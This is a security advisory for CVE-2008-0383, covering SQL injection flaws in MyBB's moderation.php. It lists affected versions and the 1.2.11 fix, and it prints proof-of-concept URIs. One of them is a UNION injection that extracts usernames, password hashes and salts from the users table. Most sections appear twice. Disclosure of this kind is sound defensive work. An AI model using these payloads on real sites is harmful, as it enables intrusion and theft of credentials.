MyBB 'moderation.php' Multiple SQL Injection Vulnerabilities
BID:27323
Info
MyBB 'moderation.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 27323 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0383 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 16 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | Janek Vind "waraxe" is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
MyBulletinBoard MyBulletinBoard 1.2.10 MyBulletinBoard MyBulletinBoard 1.2.5 MyBulletinBoard MyBulletinBoard 1.2.3 MyBulletinBoard MyBulletinBoard 1.1.8 MyBulletinBoard MyBulletinBoard 1.1.7 MyBulletinBoard MyBulletinBoard 1.1.6 MyBulletinBoard MyBulletinBoard 1.1.5 MyBulletinBoard MyBulletinBoard 1.1.4 MyBulletinBoard MyBulletinBoard 1.1.3 MyBulletinBoard MyBulletinBoard 1.1.2 MyBulletinBoard MyBulletinBoard 1.1.1 MyBulletinBoard MyBulletinBoard 1.1 MyBulletinBoard MyBulletinBoard 1.0.4 MyBulletinBoard MyBulletinBoard 1.0.3 MyBulletinBoard MyBulletinBoard 1.0.2 MyBulletinBoard MyBulletinBoard 1.0.1 MyBulletinBoard MyBulletinBoard 1.0 PR2 MyBulletinBoard MyBulletinBoard 1.0 MyBulletinBoard MyBulletinBoard RC4 MyBulletinBoard MyBulletinBoard RC3 MyBulletinBoard MyBulletinBoard RC2 MyBulletinBoard MyBulletinBoard RC1 MyBulletinBoard MyBulletinBoard 1.2 MyBulletinBoard MyBulletinBoard 1.10 |
| Not Vulnerable: |
MyBulletinBoard MyBulletinBoard 1.2.11 |
Discussion
MyBB 'moderation.php' Multiple SQL Injection Vulnerabilities
MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to MyBB 1.2.11 are vulnerable.
MyBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to MyBB 1.2.11 are vulnerable.
Exploit / POC
MyBB 'moderation.php' Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+
http://www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe
Solution / Fix
MyBB 'moderation.php' Multiple SQL Injection Vulnerabilities
Solution:
The vendor released MyBB 1.2.11 to address these issues. Please see the references for more information.
MyBulletinBoard MyBulletinBoard RC1
MyBulletinBoard MyBulletinBoard 1.2
MyBulletinBoard MyBulletinBoard RC3
MyBulletinBoard MyBulletinBoard RC4
MyBulletinBoard MyBulletinBoard 1.10
MyBulletinBoard MyBulletinBoard RC2
MyBulletinBoard MyBulletinBoard 1.0 PR2
MyBulletinBoard MyBulletinBoard 1.0
MyBulletinBoard MyBulletinBoard 1.0.1
MyBulletinBoard MyBulletinBoard 1.0.2
MyBulletinBoard MyBulletinBoard 1.0.3
MyBulletinBoard MyBulletinBoard 1.0.4
MyBulletinBoard MyBulletinBoard 1.1
MyBulletinBoard MyBulletinBoard 1.1.1
MyBulletinBoard MyBulletinBoard 1.1.2
MyBulletinBoard MyBulletinBoard 1.1.3
MyBulletinBoard MyBulletinBoard 1.1.4
MyBulletinBoard MyBulletinBoard 1.1.5
MyBulletinBoard MyBulletinBoard 1.1.6
MyBulletinBoard MyBulletinBoard 1.1.7
MyBulletinBoard MyBulletinBoard 1.1.8
MyBulletinBoard MyBulletinBoard 1.2.10
MyBulletinBoard MyBulletinBoard 1.2.3
MyBulletinBoard MyBulletinBoard 1.2.5
Solution:
The vendor released MyBB 1.2.11 to address these issues. Please see the references for more information.
MyBulletinBoard MyBulletinBoard RC1
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.2
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard RC3
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard RC4
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.10
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard RC2
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.0 PR2
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.0
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.0.1
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.0.2
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.0.3
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.0.4
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.1
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.1.1
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.1.2
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.1.3
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.1.4
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.1.5
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.1.6
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.1.7
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.1.8
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.2.10
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.2.3
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
MyBulletinBoard MyBulletinBoard 1.2.5
-
MyBulletinBoard MyBB 1.2.11
http://www.mybboard.net/download/latest
References
MyBB 'moderation.php' Multiple SQL Injection Vulnerabilities
References:
References:
- 1.2.11 Anouncement (MyBB)
- MyBulletinBoard Homepage (MyBulletinBoard)
- [waraxe-2008-SA#062] - Multiple Sql Injections in MyBB 1.2.10 ([email protected] )